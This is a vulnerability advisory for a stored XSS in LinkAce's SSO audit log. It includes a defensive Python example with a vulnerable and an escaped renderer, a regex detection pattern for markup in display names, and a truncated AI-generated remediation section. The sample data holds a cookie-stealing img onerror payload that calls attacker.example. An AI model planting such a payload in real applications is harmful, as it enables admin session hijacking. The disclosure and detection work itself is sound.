CVE-2026-45343 – LinkAce – Stored XSS via Unsanitized SSO User’s Name Rendered in Admin Audit Log Allows Session Hijacking

Posted on May 29, 2026
CVE ID: CVE-2026-45343

Published: May 28, 2026, 10:17 p.m.

Description: LinkAce is a self-hosted archive for collecting website links. Versions prior to 2.5.6 contain a stored cross-site scripting vulnerability that lets a low-privilege user execute arbitrary JavaScript in an administrator's browser session. It affects instances configured with SSO/OAuth authentication, one of LinkAce's supported authentication methods. An attacker who sets their OAuth display name to a script payload and then creates an API token plants a persistent XSS payload in the audit log, because the display name is written into the log entry without sanitization. When any admin opens /system/audit, the payload executes in the admin's browser context, which allows theft of the session cookie, exfiltration of the CSRF token (exposed in the la-app-data meta tag), or any other action the admin can perform. The vulnerability is fixed in 2.5.6.
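The two halves of the description, the unescaped display name reaching the audit-log page and the admin-side review of that page, as an added example that is not LinkAce's own code. The audit-row shape, field names and sample entries are constructed for the example (LinkAce's real schema is not shown on this page); the vulnerable renderer models the bug class, the fixed one shows the escaping that prevents it, and the scan is a triage heuristic an admin can run over exported audit rows or an SSO user list before upgrading:

```python
import html
import re

# Constructed sample audit-log rows, modelled on the description: an SSO
# user's display name is copied into the "created API token" entry. The
# field names and wording are assumptions, not LinkAce's real schema.
SAMPLE_AUDIT_ENTRIES = [
    {"id": 1, "actor": "alice", "action": "created API token"},
    {"id": 2,
     "actor": "<img src=x onerror=\"fetch('https://attacker.example/?c='"
              "+document.cookie)\">",
     "action": "created API token"},
    {"id": 3, "actor": "bob <bob@example.org>", "action": "logged in"},
]


def render_row_vulnerable(entry):
    """Interpolate the actor name into HTML without escaping: the bug class
    described for /system/audit. Any markup in the name becomes live DOM."""
    return f"<tr><td>{entry['actor']}</td><td>{entry['action']}</td></tr>"


def render_row_fixed(entry):
    """Escape every attacker-influenced string before it reaches HTML.
    html.escape() also escapes quotes, so the name cannot break out of an
    attribute either."""
    return (f"<tr><td>{html.escape(entry['actor'])}</td>"
            f"<td>{html.escape(entry['action'])}</td></tr>")


# Triage heuristic for names that are really payloads: an HTML tag that is
# commonly used to carry script, an inline event handler, or a javascript:
# URL. A plain "<user@example.org>" suffix does not trip it.
_SUSPICIOUS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed|a|style|body|input|link|meta)\b"
    r"|\bon[a-z]+\s*=|javascript\s*:",
    re.IGNORECASE,
)


def suspicious_entries(entries, field="actor"):
    """Return the ids of rows whose `field` looks like markup rather than a
    display name. Works on audit rows or on an exported SSO user list."""
    return [e["id"] for e in entries if _SUSPICIOUS.search(e.get(field, ""))]


if __name__ == "__main__":
    hit = SAMPLE_AUDIT_ENTRIES[1]
    print("vulnerable:", render_row_vulnerable(hit))
    print("fixed:     ", render_row_fixed(hit))
    print("suspicious ids:", suspicious_entries(SAMPLE_AUDIT_ENTRIES))
```

Run it and the vulnerable row carries the `<img ... onerror=...>` tag verbatim, the fixed row carries `&lt;img ... onerror=&quot;...`, and the scan reports only entry 2. The heuristic is deliberately narrow so that a legitimate name with an e-mail address in angle brackets is not flagged; anything it does flag should be treated as evidence that the payload was already served to whoever viewed the audit page.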

Severity: 8.5 | HIGH


🤖 AI-Generated Patch Solution

Google Gemini (gemini-2.5-flash) • CVE: CVE-2026-45343

1. IMMEDIATE ACTIONS
If compromise is suspected or confirmed, restrict access to the affected LinkAce instance, and in particular to /system/audit, until it has been upgraded, since every admin who opens that page executes the stored payload. Review the audit log and the SSO/OAuth user list for display names containing HTML tags, event-handler attributes or script, and note which admins have viewed the audit page since such an entry was created. Treat those admins' browser sessions as compromised: invalidate active sessions, rotate admin credentials, and revoke and reissue API tokens, because the payload runs with the admin's session cookie and CSRF token and can do anything the admin can. Initiate your organization's defined incident response procedures, including forensic data collection and stakeholder notification.

2. PATCH AND UPDATE INFORMATION
Identify all LinkAce instances running a version prior to 2.5.6 within your environment. CVE-2026-45343 is fixed in LinkAce 2.5.6. Plan and execute an upgrade to 2.5.6 or the latest stable release as soon as possible. Consult the official LinkAce security advisory (e.

💡 AI-generated — review with a security professional before acting.
